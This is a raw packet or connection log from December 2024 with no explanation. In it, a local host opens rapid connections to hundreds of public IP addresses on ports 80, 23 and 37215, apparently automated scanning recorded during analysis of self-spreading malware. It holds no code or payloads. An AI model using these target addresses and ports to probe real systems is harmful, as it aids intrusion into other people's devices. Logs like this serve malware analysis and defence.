                                                Dec 3, 2024 22:16:54.707330942 CET5577880192.168.2.23118.92.116.31
                                                Dec 3, 2024 22:16:54.707330942 CET5495480192.168.2.2378.142.26.92
                                                Dec 3, 2024 22:16:54.707330942 CET3653080192.168.2.23175.106.22.71
                                                Dec 3, 2024 22:16:54.707334995 CET5988080192.168.2.2334.232.155.108
                                                Dec 3, 2024 22:16:54.707334042 CET4178480192.168.2.2346.72.44.235
                                                Dec 3, 2024 22:16:54.707334995 CET4715280192.168.2.23171.27.195.82
                                                Dec 3, 2024 22:16:54.707330942 CET4138080192.168.2.23152.45.45.238
                                                Dec 3, 2024 22:16:54.707334995 CET3318680192.168.2.234.155.227.248
                                                Dec 3, 2024 22:16:54.707339048 CET4195280192.168.2.2370.246.26.77
                                                Dec 3, 2024 22:16:54.707330942 CET4409680192.168.2.2390.130.74.93
                                                Dec 3, 2024 22:16:54.707334042 CET4769680192.168.2.23157.179.137.136
                                                Dec 3, 2024 22:16:54.707343102 CET3941080192.168.2.2371.39.118.187
                                                Dec 3, 2024 22:16:54.707343102 CET3660080192.168.2.2360.254.185.199
                                                Dec 3, 2024 22:16:54.707345009 CET5606280192.168.2.2363.233.16.98
                                                Dec 3, 2024 22:16:54.707343102 CET5633080192.168.2.23129.37.9.102
                                                Dec 3, 2024 22:16:54.707346916 CET3949080192.168.2.23159.132.35.218
                                                Dec 3, 2024 22:16:54.707345009 CET3769280192.168.2.23136.240.205.73
                                                Dec 3, 2024 22:16:54.707351923 CET3739080192.168.2.23200.98.99.254
                                                Dec 3, 2024 22:16:54.731194973 CET8054496194.18.61.94192.168.2.23
                                                Dec 3, 2024 22:16:54.731215954 CET80555082.233.134.116192.168.2.23
                                                Dec 3, 2024 22:16:54.731226921 CET8040546128.106.21.141192.168.2.23
                                                Dec 3, 2024 22:16:54.731266022 CET5550880192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:54.731271982 CET4054680192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:54.731290102 CET5449680192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:54.731328964 CET5449680192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:54.731344938 CET5550880192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:54.731355906 CET4054680192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:54.739197016 CET4410680192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.739197016 CET4449280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.739200115 CET5990080192.168.2.23173.176.117.13
                                                Dec 3, 2024 22:16:54.739200115 CET4871080192.168.2.2336.154.130.46
                                                Dec 3, 2024 22:16:54.739204884 CET5583480192.168.2.2378.206.124.69
                                                Dec 3, 2024 22:16:54.739207029 CET3938880192.168.2.23116.204.202.129
                                                Dec 3, 2024 22:16:54.739207983 CET4518680192.168.2.2318.59.250.35
                                                Dec 3, 2024 22:16:54.739212036 CET4561280192.168.2.23174.180.202.76
                                                Dec 3, 2024 22:16:54.821598053 CET2337963113.85.98.184192.168.2.23
                                                Dec 3, 2024 22:16:54.821629047 CET233796366.41.83.133192.168.2.23
                                                Dec 3, 2024 22:16:54.821645975 CET2337963196.93.109.19192.168.2.23
                                                Dec 3, 2024 22:16:54.821665049 CET23379634.224.54.161192.168.2.23
                                                Dec 3, 2024 22:16:54.821676016 CET2337963109.57.79.190192.168.2.23
                                                Dec 3, 2024 22:16:54.821748018 CET2337963185.205.209.120192.168.2.23
                                                Dec 3, 2024 22:16:54.821757078 CET233796381.182.255.227192.168.2.23
                                                Dec 3, 2024 22:16:54.821777105 CET3796323192.168.2.234.224.54.161
                                                Dec 3, 2024 22:16:54.821779966 CET3796323192.168.2.23113.85.98.184
                                                Dec 3, 2024 22:16:54.821779966 CET3796323192.168.2.2381.182.255.227
                                                Dec 3, 2024 22:16:54.821808100 CET2337963206.173.95.77192.168.2.23
                                                Dec 3, 2024 22:16:54.821827888 CET233796357.164.18.81192.168.2.23
                                                Dec 3, 2024 22:16:54.821829081 CET3796323192.168.2.2366.41.83.133
                                                Dec 3, 2024 22:16:54.821834087 CET3796323192.168.2.23196.93.109.19
                                                Dec 3, 2024 22:16:54.821847916 CET3796323192.168.2.23206.173.95.77
                                                Dec 3, 2024 22:16:54.821854115 CET3796323192.168.2.23185.205.209.120
                                                Dec 3, 2024 22:16:54.821854115 CET3796323192.168.2.23109.57.79.190
                                                Dec 3, 2024 22:16:54.821866035 CET3796323192.168.2.2357.164.18.81
                                                Dec 3, 2024 22:16:54.827251911 CET8047612210.159.47.47192.168.2.23
                                                Dec 3, 2024 22:16:54.827337027 CET4761280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.827394962 CET4761280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.827395916 CET4761280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.827835083 CET4802280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.835187912 CET5026037215192.168.2.23156.110.116.192
                                                Dec 3, 2024 22:16:54.835187912 CET5041437215192.168.2.23156.142.216.19
                                                Dec 3, 2024 22:16:54.835202932 CET3836437215192.168.2.23156.30.63.25
                                                Dec 3, 2024 22:16:54.835206985 CET5420837215192.168.2.23156.173.48.6
                                                Dec 3, 2024 22:16:54.835208893 CET5113437215192.168.2.2341.72.40.186
                                                Dec 3, 2024 22:16:54.835208893 CET5389437215192.168.2.23197.125.185.133
                                                Dec 3, 2024 22:16:54.835208893 CET3763037215192.168.2.23156.127.117.248
                                                Dec 3, 2024 22:16:54.853367090 CET8040546128.106.21.141192.168.2.23
                                                Dec 3, 2024 22:16:54.853377104 CET80555082.233.134.116192.168.2.23
                                                Dec 3, 2024 22:16:54.853390932 CET8054496194.18.61.94192.168.2.23
                                                Dec 3, 2024 22:16:54.853399992 CET80555082.233.134.116192.168.2.23
                                                Dec 3, 2024 22:16:54.853432894 CET5550880192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:54.853528023 CET8040546128.106.21.141192.168.2.23
                                                Dec 3, 2024 22:16:54.853571892 CET4054680192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:54.853703022 CET8054496194.18.61.94192.168.2.23
                                                Dec 3, 2024 22:16:54.853768110 CET5449680192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:54.859141111 CET8044106211.28.212.81192.168.2.23
                                                Dec 3, 2024 22:16:54.859185934 CET8044492178.212.220.26192.168.2.23
                                                Dec 3, 2024 22:16:54.859203100 CET4410680192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.859215975 CET4449280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.859236956 CET4410680192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.859236956 CET4410680192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.859548092 CET4449080192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.859915972 CET4449280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.859915972 CET4449280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.860177040 CET4487280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.947325945 CET8047612210.159.47.47192.168.2.23
                                                Dec 3, 2024 22:16:54.947770119 CET8048022210.159.47.47192.168.2.23
                                                Dec 3, 2024 22:16:54.947848082 CET4802280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.947877884 CET4802280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:54.955482960 CET3721550260156.110.116.192192.168.2.23
                                                Dec 3, 2024 22:16:54.955535889 CET5026037215192.168.2.23156.110.116.192
                                                Dec 3, 2024 22:16:54.955538034 CET3721550414156.142.216.19192.168.2.23
                                                Dec 3, 2024 22:16:54.955549955 CET3721538364156.30.63.25192.168.2.23
                                                Dec 3, 2024 22:16:54.955566883 CET3721553894197.125.185.133192.168.2.23
                                                Dec 3, 2024 22:16:54.955574989 CET372155113441.72.40.186192.168.2.23
                                                Dec 3, 2024 22:16:54.955584049 CET3721537630156.127.117.248192.168.2.23
                                                Dec 3, 2024 22:16:54.955585003 CET5041437215192.168.2.23156.142.216.19
                                                Dec 3, 2024 22:16:54.955585957 CET3836437215192.168.2.23156.30.63.25
                                                Dec 3, 2024 22:16:54.955610037 CET5113437215192.168.2.2341.72.40.186
                                                Dec 3, 2024 22:16:54.955610037 CET3763037215192.168.2.23156.127.117.248
                                                Dec 3, 2024 22:16:54.955610991 CET5389437215192.168.2.23197.125.185.133
                                                Dec 3, 2024 22:16:54.955636024 CET3721554208156.173.48.6192.168.2.23
                                                Dec 3, 2024 22:16:54.955677986 CET5420837215192.168.2.23156.173.48.6
                                                Dec 3, 2024 22:16:54.956010103 CET5384637215192.168.2.2341.195.129.201
                                                Dec 3, 2024 22:16:54.956636906 CET6013637215192.168.2.23156.138.215.210
                                                Dec 3, 2024 22:16:54.957283974 CET5564037215192.168.2.2341.48.156.167
                                                Dec 3, 2024 22:16:54.957932949 CET4557237215192.168.2.23156.234.118.115
                                                Dec 3, 2024 22:16:54.958628893 CET5524237215192.168.2.23197.199.156.6
                                                Dec 3, 2024 22:16:54.959280014 CET4073437215192.168.2.23197.236.127.19
                                                Dec 3, 2024 22:16:54.959733009 CET5026037215192.168.2.23156.110.116.192
                                                Dec 3, 2024 22:16:54.959733009 CET5026037215192.168.2.23156.110.116.192
                                                Dec 3, 2024 22:16:54.960010052 CET5039037215192.168.2.23156.110.116.192
                                                Dec 3, 2024 22:16:54.960355997 CET5389437215192.168.2.23197.125.185.133
                                                Dec 3, 2024 22:16:54.960355997 CET5389437215192.168.2.23197.125.185.133
                                                Dec 3, 2024 22:16:54.960623980 CET5403837215192.168.2.23197.125.185.133
                                                Dec 3, 2024 22:16:54.960994959 CET3763037215192.168.2.23156.127.117.248
                                                Dec 3, 2024 22:16:54.960994959 CET3763037215192.168.2.23156.127.117.248
                                                Dec 3, 2024 22:16:54.961261988 CET3777437215192.168.2.23156.127.117.248
                                                Dec 3, 2024 22:16:54.961608887 CET5113437215192.168.2.2341.72.40.186
                                                Dec 3, 2024 22:16:54.961608887 CET5113437215192.168.2.2341.72.40.186
                                                Dec 3, 2024 22:16:54.961880922 CET5127837215192.168.2.2341.72.40.186
                                                Dec 3, 2024 22:16:54.962239981 CET5420837215192.168.2.23156.173.48.6
                                                Dec 3, 2024 22:16:54.962239981 CET5420837215192.168.2.23156.173.48.6
                                                Dec 3, 2024 22:16:54.962515116 CET5435237215192.168.2.23156.173.48.6
                                                Dec 3, 2024 22:16:54.962894917 CET3836437215192.168.2.23156.30.63.25
                                                Dec 3, 2024 22:16:54.962894917 CET3836437215192.168.2.23156.30.63.25
                                                Dec 3, 2024 22:16:54.963164091 CET4225837215192.168.2.23197.1.206.139
                                                Dec 3, 2024 22:16:54.963165045 CET5893437215192.168.2.23156.136.30.83
                                                Dec 3, 2024 22:16:54.963165045 CET5705237215192.168.2.23197.36.67.95
                                                Dec 3, 2024 22:16:54.963166952 CET5783837215192.168.2.23197.205.167.250
                                                Dec 3, 2024 22:16:54.963191986 CET3850837215192.168.2.23156.30.63.25
                                                Dec 3, 2024 22:16:54.963563919 CET5041437215192.168.2.23156.142.216.19
                                                Dec 3, 2024 22:16:54.963563919 CET5041437215192.168.2.23156.142.216.19
                                                Dec 3, 2024 22:16:54.963850975 CET5055837215192.168.2.23156.142.216.19
                                                Dec 3, 2024 22:16:54.979353905 CET8044106211.28.212.81192.168.2.23
                                                Dec 3, 2024 22:16:54.979595900 CET8044490211.28.212.81192.168.2.23
                                                Dec 3, 2024 22:16:54.979652882 CET4449080192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.979707956 CET4449080192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:54.980060101 CET8044492178.212.220.26192.168.2.23
                                                Dec 3, 2024 22:16:54.980369091 CET8044872178.212.220.26192.168.2.23
                                                Dec 3, 2024 22:16:54.980412960 CET4487280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.980432987 CET4487280192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:54.987608910 CET8047612210.159.47.47192.168.2.23
                                                Dec 3, 2024 22:16:55.019665003 CET8044106211.28.212.81192.168.2.23
                                                Dec 3, 2024 22:16:55.023614883 CET8044492178.212.220.26192.168.2.23
                                                Dec 3, 2024 22:16:55.027168989 CET4719880192.168.2.23102.244.213.7
                                                Dec 3, 2024 22:16:55.027169943 CET5661880192.168.2.23119.163.95.200
                                                Dec 3, 2024 22:16:55.027169943 CET4193680192.168.2.2366.167.139.239
                                                Dec 3, 2024 22:16:55.027174950 CET5058480192.168.2.23165.204.23.192
                                                Dec 3, 2024 22:16:55.027175903 CET4243280192.168.2.2360.178.102.141
                                                Dec 3, 2024 22:16:55.027180910 CET4871880192.168.2.23200.217.174.254
                                                Dec 3, 2024 22:16:55.027180910 CET4652080192.168.2.2363.186.73.228
                                                Dec 3, 2024 22:16:55.027183056 CET3983480192.168.2.23123.103.236.184
                                                Dec 3, 2024 22:16:55.027183056 CET3890480192.168.2.23189.182.4.61
                                                Dec 3, 2024 22:16:55.027183056 CET5664880192.168.2.23209.127.151.124
                                                Dec 3, 2024 22:16:55.027184963 CET5111280192.168.2.23154.142.82.9
                                                Dec 3, 2024 22:16:55.027187109 CET5520080192.168.2.23102.76.177.99
                                                Dec 3, 2024 22:16:55.027187109 CET5933280192.168.2.23155.118.130.193
                                                Dec 3, 2024 22:16:55.027194977 CET4855280192.168.2.23129.148.53.122
                                                Dec 3, 2024 22:16:55.068222046 CET8048022210.159.47.47192.168.2.23
                                                Dec 3, 2024 22:16:55.068298101 CET4802280192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:55.075927973 CET372155384641.195.129.201192.168.2.23
                                                Dec 3, 2024 22:16:55.075998068 CET5384637215192.168.2.2341.195.129.201
                                                Dec 3, 2024 22:16:55.076040983 CET5384637215192.168.2.2341.195.129.201
                                                Dec 3, 2024 22:16:55.076040983 CET5384637215192.168.2.2341.195.129.201
                                                Dec 3, 2024 22:16:55.076401949 CET5387237215192.168.2.2341.195.129.201
                                                Dec 3, 2024 22:16:55.076586962 CET3721560136156.138.215.210192.168.2.23
                                                Dec 3, 2024 22:16:55.076632023 CET6013637215192.168.2.23156.138.215.210
                                                Dec 3, 2024 22:16:55.076745033 CET6013637215192.168.2.23156.138.215.210
                                                Dec 3, 2024 22:16:55.076745033 CET6013637215192.168.2.23156.138.215.210
                                                Dec 3, 2024 22:16:55.077003956 CET6016237215192.168.2.23156.138.215.210
                                                Dec 3, 2024 22:16:55.077161074 CET372155564041.48.156.167192.168.2.23
                                                Dec 3, 2024 22:16:55.077199936 CET5564037215192.168.2.2341.48.156.167
                                                Dec 3, 2024 22:16:55.077337980 CET5564037215192.168.2.2341.48.156.167
                                                Dec 3, 2024 22:16:55.077337980 CET5564037215192.168.2.2341.48.156.167
                                                Dec 3, 2024 22:16:55.077604055 CET5566637215192.168.2.2341.48.156.167
                                                Dec 3, 2024 22:16:55.077785969 CET3721545572156.234.118.115192.168.2.23
                                                Dec 3, 2024 22:16:55.077821970 CET4557237215192.168.2.23156.234.118.115
                                                Dec 3, 2024 22:16:55.077941895 CET4557237215192.168.2.23156.234.118.115
                                                Dec 3, 2024 22:16:55.077941895 CET4557237215192.168.2.23156.234.118.115
                                                Dec 3, 2024 22:16:55.078193903 CET4559837215192.168.2.23156.234.118.115
                                                Dec 3, 2024 22:16:55.078546047 CET3721555242197.199.156.6192.168.2.23
                                                Dec 3, 2024 22:16:55.078583002 CET5524237215192.168.2.23197.199.156.6
                                                Dec 3, 2024 22:16:55.078597069 CET5524237215192.168.2.23197.199.156.6
                                                Dec 3, 2024 22:16:55.078597069 CET5524237215192.168.2.23197.199.156.6
                                                Dec 3, 2024 22:16:55.078846931 CET5526837215192.168.2.23197.199.156.6
                                                Dec 3, 2024 22:16:55.079180002 CET3721540734197.236.127.19192.168.2.23
                                                Dec 3, 2024 22:16:55.079220057 CET4073437215192.168.2.23197.236.127.19
                                                Dec 3, 2024 22:16:55.079233885 CET3745137215192.168.2.2341.120.228.146
                                                Dec 3, 2024 22:16:55.079241037 CET3745137215192.168.2.23156.255.63.214
                                                Dec 3, 2024 22:16:55.079241991 CET3745137215192.168.2.2341.234.29.207
                                                Dec 3, 2024 22:16:55.079243898 CET3745137215192.168.2.2341.137.32.181
                                                Dec 3, 2024 22:16:55.079247952 CET3745137215192.168.2.23156.167.52.210
                                                Dec 3, 2024 22:16:55.079262018 CET3745137215192.168.2.23156.114.18.151
                                                Dec 3, 2024 22:16:55.079268932 CET3745137215192.168.2.23156.187.218.218
                                                Dec 3, 2024 22:16:55.079268932 CET3745137215192.168.2.23197.212.114.141
                                                Dec 3, 2024 22:16:55.079268932 CET3745137215192.168.2.23156.44.161.32
                                                Dec 3, 2024 22:16:55.079269886 CET3745137215192.168.2.23197.251.79.78
                                                Dec 3, 2024 22:16:55.079272985 CET3745137215192.168.2.2341.4.195.62
                                                Dec 3, 2024 22:16:55.079288006 CET3745137215192.168.2.23197.75.171.174
                                                Dec 3, 2024 22:16:55.079293966 CET3745137215192.168.2.23156.66.105.229
                                                Dec 3, 2024 22:16:55.079296112 CET3745137215192.168.2.23156.213.77.41
                                                Dec 3, 2024 22:16:55.079296112 CET3745137215192.168.2.23197.240.18.68
                                                Dec 3, 2024 22:16:55.079296112 CET3745137215192.168.2.23156.3.253.74
                                                Dec 3, 2024 22:16:55.079302073 CET3745137215192.168.2.2341.207.83.81
                                                Dec 3, 2024 22:16:55.079303026 CET3745137215192.168.2.23156.170.231.52
                                                Dec 3, 2024 22:16:55.079327106 CET3745137215192.168.2.23197.4.255.171
                                                Dec 3, 2024 22:16:55.079328060 CET3745137215192.168.2.23156.249.169.47
                                                Dec 3, 2024 22:16:55.079328060 CET3745137215192.168.2.2341.150.40.32
                                                Dec 3, 2024 22:16:55.079330921 CET3745137215192.168.2.23156.72.35.8
                                                Dec 3, 2024 22:16:55.079332113 CET3745137215192.168.2.23156.202.172.76
                                                Dec 3, 2024 22:16:55.079333067 CET3745137215192.168.2.2341.7.254.133
                                                Dec 3, 2024 22:16:55.079333067 CET3745137215192.168.2.23156.237.163.218
                                                Dec 3, 2024 22:16:55.079333067 CET3745137215192.168.2.23156.104.44.167
                                                Dec 3, 2024 22:16:55.079344988 CET3745137215192.168.2.23197.69.148.2
                                                Dec 3, 2024 22:16:55.079344988 CET3745137215192.168.2.23156.102.85.171
                                                Dec 3, 2024 22:16:55.079346895 CET3745137215192.168.2.23197.9.19.137
                                                Dec 3, 2024 22:16:55.079346895 CET3745137215192.168.2.2341.172.32.6
                                                Dec 3, 2024 22:16:55.079355001 CET3745137215192.168.2.23197.161.111.121
                                                Dec 3, 2024 22:16:55.079355001 CET3745137215192.168.2.23197.25.213.44
                                                Dec 3, 2024 22:16:55.079358101 CET3745137215192.168.2.2341.16.70.42
                                                Dec 3, 2024 22:16:55.079359055 CET3745137215192.168.2.2341.230.153.94
                                                Dec 3, 2024 22:16:55.079361916 CET3745137215192.168.2.23197.231.234.66
                                                Dec 3, 2024 22:16:55.079361916 CET3745137215192.168.2.23156.16.120.246
                                                Dec 3, 2024 22:16:55.079377890 CET3745137215192.168.2.23197.57.193.85
                                                Dec 3, 2024 22:16:55.079379082 CET3745137215192.168.2.23197.240.234.226
                                                Dec 3, 2024 22:16:55.079379082 CET3745137215192.168.2.23156.203.15.142
                                                Dec 3, 2024 22:16:55.079379082 CET3745137215192.168.2.23156.126.228.160
                                                Dec 3, 2024 22:16:55.079381943 CET3745137215192.168.2.23197.229.116.182
                                                Dec 3, 2024 22:16:55.079381943 CET3745137215192.168.2.23197.248.213.149
                                                Dec 3, 2024 22:16:55.079381943 CET3745137215192.168.2.23197.202.230.237
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.23156.32.250.81
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.23197.28.142.175
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.2341.150.57.16
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.23197.140.96.194
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.23156.212.52.214
                                                Dec 3, 2024 22:16:55.079382896 CET3745137215192.168.2.23156.94.75.38
                                                Dec 3, 2024 22:16:55.079385996 CET3745137215192.168.2.2341.216.143.164
                                                Dec 3, 2024 22:16:55.079385996 CET3745137215192.168.2.2341.77.198.149
                                                Dec 3, 2024 22:16:55.079385996 CET3745137215192.168.2.23197.165.113.216
                                                Dec 3, 2024 22:16:55.079392910 CET3745137215192.168.2.23156.135.122.159
                                                Dec 3, 2024 22:16:55.079392910 CET3745137215192.168.2.23156.210.101.192
                                                Dec 3, 2024 22:16:55.079397917 CET3745137215192.168.2.23197.52.112.47
                                                Dec 3, 2024 22:16:55.079397917 CET3745137215192.168.2.23156.124.44.219
                                                Dec 3, 2024 22:16:55.079400063 CET3745137215192.168.2.23156.95.86.173
                                                Dec 3, 2024 22:16:55.079401970 CET3745137215192.168.2.2341.117.97.130
                                                Dec 3, 2024 22:16:55.079401970 CET3745137215192.168.2.23156.65.70.155
                                                Dec 3, 2024 22:16:55.079404116 CET3745137215192.168.2.2341.43.44.237
                                                Dec 3, 2024 22:16:55.079405069 CET3745137215192.168.2.23197.23.132.71
                                                Dec 3, 2024 22:16:55.079405069 CET3745137215192.168.2.23197.95.230.54
                                                Dec 3, 2024 22:16:55.079405069 CET3745137215192.168.2.23197.103.192.226
                                                Dec 3, 2024 22:16:55.079405069 CET3745137215192.168.2.2341.106.194.170
                                                Dec 3, 2024 22:16:55.079417944 CET3745137215192.168.2.23197.209.152.198
                                                Dec 3, 2024 22:16:55.079418898 CET3745137215192.168.2.2341.71.64.149
                                                Dec 3, 2024 22:16:55.079418898 CET3745137215192.168.2.2341.6.116.174
                                                Dec 3, 2024 22:16:55.079418898 CET3745137215192.168.2.2341.30.94.31
                                                Dec 3, 2024 22:16:55.079418898 CET3745137215192.168.2.23197.3.254.205
                                                Dec 3, 2024 22:16:55.079421043 CET3745137215192.168.2.23197.15.15.116
                                                Dec 3, 2024 22:16:55.079421043 CET3745137215192.168.2.2341.189.160.60
                                                Dec 3, 2024 22:16:55.079421043 CET3745137215192.168.2.2341.183.163.6
                                                Dec 3, 2024 22:16:55.079421997 CET3745137215192.168.2.23156.125.236.144
                                                Dec 3, 2024 22:16:55.079421043 CET3745137215192.168.2.2341.149.173.230
                                                Dec 3, 2024 22:16:55.079421043 CET3745137215192.168.2.23197.0.96.230
                                                Dec 3, 2024 22:16:55.079442024 CET3745137215192.168.2.2341.166.119.187
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.23156.220.107.234
                                                Dec 3, 2024 22:16:55.079442024 CET3745137215192.168.2.23156.43.89.81
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.23156.59.167.75
                                                Dec 3, 2024 22:16:55.079443932 CET3745137215192.168.2.2341.123.76.169
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.23197.220.19.172
                                                Dec 3, 2024 22:16:55.079443932 CET3745137215192.168.2.23197.51.229.39
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.2341.6.68.208
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.23197.165.94.68
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.2341.104.129.83
                                                Dec 3, 2024 22:16:55.079442978 CET3745137215192.168.2.23156.45.140.130
                                                Dec 3, 2024 22:16:55.079452038 CET3745137215192.168.2.23197.57.142.12
                                                Dec 3, 2024 22:16:55.079452038 CET3745137215192.168.2.2341.63.29.116
                                                Dec 3, 2024 22:16:55.079452038 CET3745137215192.168.2.23156.143.87.81
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.2341.55.154.153
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.23156.67.234.240
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.23197.0.71.104
                                                Dec 3, 2024 22:16:55.079453945 CET3745137215192.168.2.23197.64.19.126
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.23156.44.182.234
                                                Dec 3, 2024 22:16:55.079453945 CET3745137215192.168.2.2341.51.177.96
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.23197.129.43.78
                                                Dec 3, 2024 22:16:55.079452991 CET3745137215192.168.2.23197.10.179.129
                                                Dec 3, 2024 22:16:55.079457998 CET3745137215192.168.2.2341.165.246.83
                                                Dec 3, 2024 22:16:55.079457998 CET3745137215192.168.2.23197.54.96.189
                                                Dec 3, 2024 22:16:55.079461098 CET3745137215192.168.2.2341.204.102.227
                                                Dec 3, 2024 22:16:55.079461098 CET3745137215192.168.2.23156.245.47.19
                                                Dec 3, 2024 22:16:55.079461098 CET3745137215192.168.2.23197.255.227.106
                                                Dec 3, 2024 22:16:55.079464912 CET3745137215192.168.2.23197.29.36.169
                                                Dec 3, 2024 22:16:55.079464912 CET3745137215192.168.2.23197.1.30.64
                                                Dec 3, 2024 22:16:55.079468966 CET3745137215192.168.2.23197.178.11.255
                                                Dec 3, 2024 22:16:55.079469919 CET3745137215192.168.2.23156.196.174.108
                                                Dec 3, 2024 22:16:55.079469919 CET3745137215192.168.2.2341.170.222.238
                                                Dec 3, 2024 22:16:55.079469919 CET3745137215192.168.2.2341.11.225.46
                                                Dec 3, 2024 22:16:55.079472065 CET3745137215192.168.2.2341.11.24.20
                                                Dec 3, 2024 22:16:55.079472065 CET3745137215192.168.2.23156.137.97.75
                                                Dec 3, 2024 22:16:55.079472065 CET3745137215192.168.2.2341.27.116.138
                                                Dec 3, 2024 22:16:55.079472065 CET3745137215192.168.2.23156.58.223.121
                                                Dec 3, 2024 22:16:55.079473972 CET3745137215192.168.2.2341.194.209.195
                                                Dec 3, 2024 22:16:55.079472065 CET3745137215192.168.2.23197.188.75.230
                                                Dec 3, 2024 22:16:55.079489946 CET3745137215192.168.2.2341.181.166.205
                                                Dec 3, 2024 22:16:55.079489946 CET3745137215192.168.2.2341.4.205.61
                                                Dec 3, 2024 22:16:55.079490900 CET3745137215192.168.2.2341.211.109.95
                                                Dec 3, 2024 22:16:55.079490900 CET3745137215192.168.2.2341.201.248.243
                                                Dec 3, 2024 22:16:55.079490900 CET3745137215192.168.2.23156.213.197.75
                                                Dec 3, 2024 22:16:55.079490900 CET3745137215192.168.2.23156.103.168.68
                                                Dec 3, 2024 22:16:55.079490900 CET3745137215192.168.2.23197.138.9.175
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23156.7.130.247
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.2341.239.180.224
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23156.100.48.200
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23156.9.239.90
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23197.69.148.216
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.2341.140.85.26
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23197.6.114.137
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23156.139.88.169
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23197.246.130.126
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23197.255.160.67
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23197.225.204.89
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.2341.108.38.247
                                                Dec 3, 2024 22:16:55.079493046 CET3745137215192.168.2.23197.219.192.9
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23156.67.48.184
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23197.32.249.197
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23197.82.175.162
                                                Dec 3, 2024 22:16:55.079494953 CET3745137215192.168.2.23156.11.110.144
                                                Dec 3, 2024 22:16:55.079504013 CET3745137215192.168.2.23197.221.152.16
                                                Dec 3, 2024 22:16:55.079507113 CET3745137215192.168.2.23156.145.182.48
                                                Dec 3, 2024 22:16:55.079508066 CET3745137215192.168.2.2341.174.107.72
                                                Dec 3, 2024 22:16:55.079509974 CET3745137215192.168.2.2341.117.188.192
                                                Dec 3, 2024 22:16:55.079509974 CET3745137215192.168.2.23156.186.24.88
                                                Dec 3, 2024 22:16:55.079509974 CET3745137215192.168.2.23197.245.249.207
                                                Dec 3, 2024 22:16:55.079513073 CET3745137215192.168.2.23197.28.199.96
                                                Dec 3, 2024 22:16:55.079513073 CET3745137215192.168.2.2341.55.1.172
                                                Dec 3, 2024 22:16:55.079513073 CET3745137215192.168.2.23156.248.103.251
                                                Dec 3, 2024 22:16:55.079513073 CET3745137215192.168.2.23197.70.168.35
                                                Dec 3, 2024 22:16:55.079513073 CET3745137215192.168.2.2341.58.21.26
                                                Dec 3, 2024 22:16:55.079514980 CET3745137215192.168.2.23197.108.74.91
                                                Dec 3, 2024 22:16:55.079514980 CET3745137215192.168.2.2341.172.157.224
                                                Dec 3, 2024 22:16:55.079514980 CET3745137215192.168.2.2341.239.59.243
                                                Dec 3, 2024 22:16:55.079515934 CET3745137215192.168.2.2341.162.83.32
                                                Dec 3, 2024 22:16:55.079514980 CET3745137215192.168.2.2341.234.100.179
                                                Dec 3, 2024 22:16:55.079515934 CET3745137215192.168.2.2341.188.4.117
                                                Dec 3, 2024 22:16:55.079514980 CET3745137215192.168.2.23197.15.164.219
